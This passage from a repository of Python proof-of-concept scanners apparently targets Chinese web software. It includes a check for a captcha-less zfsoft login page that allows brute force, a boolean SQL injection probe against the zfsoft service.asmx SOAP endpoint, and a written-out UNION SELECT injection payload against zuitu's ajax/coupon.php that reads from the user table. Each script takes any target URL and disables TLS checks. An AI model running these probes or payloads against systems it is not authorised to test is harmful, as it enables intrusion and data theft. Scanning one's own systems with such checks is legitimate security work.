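        # Base URL of the site under test.
        self.url = url

    @staticmethod
    def _default3_url(landing_url):
        """Derive the ``default3.aspx`` URL from the URL the site redirected to.

        The landing URL is lower-cased, any "default2.aspx"/"default.aspx"
        page name is stripped, and "default3.aspx" is appended. This is plain
        concatenation, exactly as before: a landing URL without a trailing
        slash gets "default3.aspx" glued onto its last path element.
        """
        base = str(landing_url).lower()
        base = base.replace("default2.aspx", "").replace("default.aspx", "")
        return base + "default3.aspx"

    def run(self):
        """Run both requests and print the verdict; returns nothing."""
        headers = {"User-Agent": self._UA}
        try:
            landing = requests.get(self.url, headers=headers, timeout=6, verify=False, allow_redirects=True)
        except requests.RequestException:
            # The original swallowed this error and then crashed with
            # NameError on an unbound ``req``; report and stop instead.
            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
            return
        vulnurl = self._default3_url(landing.url)
        try:
            req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
            is_form = "__VIEWSTATEGENERATOR" in req.text
            has_captcha = "CheckCode.aspx" in req.text
            if is_form and not has_captcha and req.status_code == 200:
                cprint("[+]存在正方教务系统default3.aspx爆破页面...(敏感信息)\tpayload: "+vulnurl, "green")
            else:
                cprint("[-]不存在zfsoft_default3_bruteforce漏洞", "white", "on_grey")
        except requests.RequestException:
            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")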
42 |
if __name__ == "__main__":
    # CLI entry: the only argument is the target base URL. All warnings are
    # silenced (presumably to hide the TLS warning that verify=False triggers).
    warnings.filterwarnings("ignore")
    zfsoft_default3_bruteforce_BaseVerify(sys.argv[1]).run()
47 |
--------------------------------------------------------------------------------
/pocs/zfsoft/zfsoft_service_stryhm_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 正方教务系统services.asmx SQL注入
5 | referer: http://www.wooyun.org/bugs/WooYun-2015-122523
6 | author: Lucifer
7 | description: webservice注入。
8 | '''
9 | import re
10 | import os
11 | import sys
12 | import requests
13 | import warnings
14 | from termcolor import cprint
15 |
class zfsoft_service_stryhm_sqli_BaseVerify:
    """Boolean-difference check against the zfsoft ``service.asmx`` SOAP endpoint.

    ``run`` reads two SOAP request bodies from
    ``<cwd>/pocs/zfsoft/xml/zfsoft_service_stryhm_sqli_{true,false}.xml`` --
    the paths are built from ``os.getcwd()``, so the scanner must be started
    from the repository root, and a missing file raises before the ``try``
    block -- POSTs each with the ``BMCheckPassword`` SOAPAction, and compares
    the first decimal digit found in either response body. Differing digits
    are reported as the finding. TLS certificate validation is disabled.
    """

    _HEADERS = {
        "User-Agent": "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50",
        "Content-Type": "text/xml; charset=utf-8",
        "SOAPAction": "http://www.zf_webservice.com/BMCheckPassword",
    }
    _SERVICE_PATH = "/service.asmx"
    _XML_DIR = "/pocs/zfsoft/xml/"
    _DIGIT = re.compile('[0-9]')

    def __init__(self, url):
        # Base URL of the site under test.
        self.url = url

    @classmethod
    def _read_body(cls, name):
        """Return the SOAP body stored in ``<cwd>/pocs/zfsoft/xml/<name>``."""
        with open(os.getcwd() + cls._XML_DIR + name, "r") as f:
            return f.read()

    @classmethod
    def _first_digit(cls, text):
        """Return the first decimal digit in *text* as an int (AttributeError when there is none)."""
        return int(cls._DIGIT.search(text).group(0))

    def run(self):
        """POST both bodies, compare the replies and print the verdict; returns nothing."""
        post_true = self._read_body("zfsoft_service_stryhm_sqli_true.xml")
        post_false = self._read_body("zfsoft_service_stryhm_sqli_false.xml")
        vulnurl = self.url + self._SERVICE_PATH
        try:
            reply_true = requests.post(vulnurl, data=post_true, headers=self._HEADERS, timeout=10, verify=False)
            reply_false = requests.post(vulnurl, data=post_false, headers=self._HEADERS, timeout=10, verify=False)
            # Evaluate the "true" reply first so a digit-less reply fails in the same order as before.
            if self._first_digit(reply_true.text) == self._first_digit(reply_false.text):
                cprint("[-]不存在zfsoft_service_stryhm_sqli漏洞", "white", "on_grey")
            else:
                cprint("[+]存在正方教务系统services.asmx SQL注入漏洞...(高危)\tpayload: "+vulnurl+"..[需要对比查看xml文件内容]", "red")
        except:
            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
49 |
if __name__ == "__main__":
    # CLI entry: the only argument is the target base URL. All warnings are
    # silenced (presumably to hide the TLS warning that verify=False triggers).
    warnings.filterwarnings("ignore")
    zfsoft_service_stryhm_sqli_BaseVerify(sys.argv[1]).run()
--------------------------------------------------------------------------------
/pocs/zuitu/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Binye234/What_Cms_Auto_Poc/56cae28bfecfe3032efe6578c3f571e5de21a3e9/pocs/zuitu/__init__.py
--------------------------------------------------------------------------------
/pocs/zuitu/zuitu_coupon_id_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 最土团购SQL注入
5 | referer: http://www.wooyun.org/bugs/wooyun-2010-075525
6 | author: Lucifer
7 | description: 基础函数过滤不全导致注射。ajax/coupon.php文件id参数存在注入。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
class zuitu_coupon_id_sqli_BaseVerify:
    """Check the zuitu ``ajax/coupon.php`` ``id`` parameter for an injection signature.

    ``run`` GETs the endpoint with a fixed ``id`` value and reports the
    finding when the md5(1234) digest appears in the response body. TLS
    certificate validation is disabled for the request.
    """

    _UA = "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
    _PAYLOAD = "/ajax/coupon.php?action=consume&secret=8&id=2%27%29/**/AnD/**/1=2/**/UnIoN/**/SeLeCt/**/1,2,0,4,5,6,Md5(1234),8,9,10,11,9999999999,13,14,15,16/**/FrOm/**/user/**/WhErE/**/manager=0x59/**/LiMiT/**/0,1%23"
    _MARKER = "81dc9bdb52d04dc20036dbd8313ed055"

    def __init__(self, url):
        # Base URL of the site under test.
        self.url = url

    def run(self):
        """Send the probe and print the verdict; returns nothing."""
        vulnurl = self.url + self._PAYLOAD
        try:
            reply = requests.get(vulnurl, headers={"User-Agent": self._UA}, timeout=10, verify=False)
            self._report(self._MARKER in reply.text, vulnurl)
        except:
            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")

    @staticmethod
    def _report(found, vulnurl):
        """Print the positive or negative verdict for *vulnurl*."""
        if not found:
            cprint("[-]不存在zuitu_coupon_id_sqli漏洞", "white", "on_grey")
            return
        cprint("[+]存在最土团购SQL注入漏洞...(高危)\tpayload: "+vulnurl, "red")
33 |
if __name__ == "__main__":
    # CLI entry: the only argument is the target base URL. All warnings are
    # silenced (presumably to hide the TLS warning that verify=False triggers).
    warnings.filterwarnings("ignore")
    zuitu_coupon_id_sqli_BaseVerify(sys.argv[1]).run()
--------------------------------------------------------------------------------